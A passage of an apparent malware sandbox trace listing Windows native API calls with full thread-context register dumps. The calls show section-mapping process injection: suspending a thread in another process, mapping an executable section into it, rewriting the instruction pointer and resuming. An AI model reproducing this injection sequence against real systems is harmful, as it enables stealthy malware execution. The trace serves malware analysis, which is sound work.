returned 0x0 [0167.173] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0167.179] NtClose (Handle=0x140) returned 0x0 [0167.180] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2cc000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x624707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.186] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0167.186] NtClose (Handle=0x138) returned 0x0 [0167.186] NtClose (Handle=0xb4) returned 0x0 [0167.195] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x230, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0167.196] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0167.196] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0167.196] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x234000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0167.196] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0167.199] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xc7c) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0167.199] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0167.199] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2740000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0167.207] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x234000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.212] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0167.212] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x145200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x146000) returned 0x0 [0167.221] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x145200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0xc60000, SectionOffset=0x0, ViewSize=0xde6e8*=0x146000) returned 0x0 [0167.256] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0167.267] NtClose (Handle=0x140) returned 0x0 [0167.267] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x234000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0xd12707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, 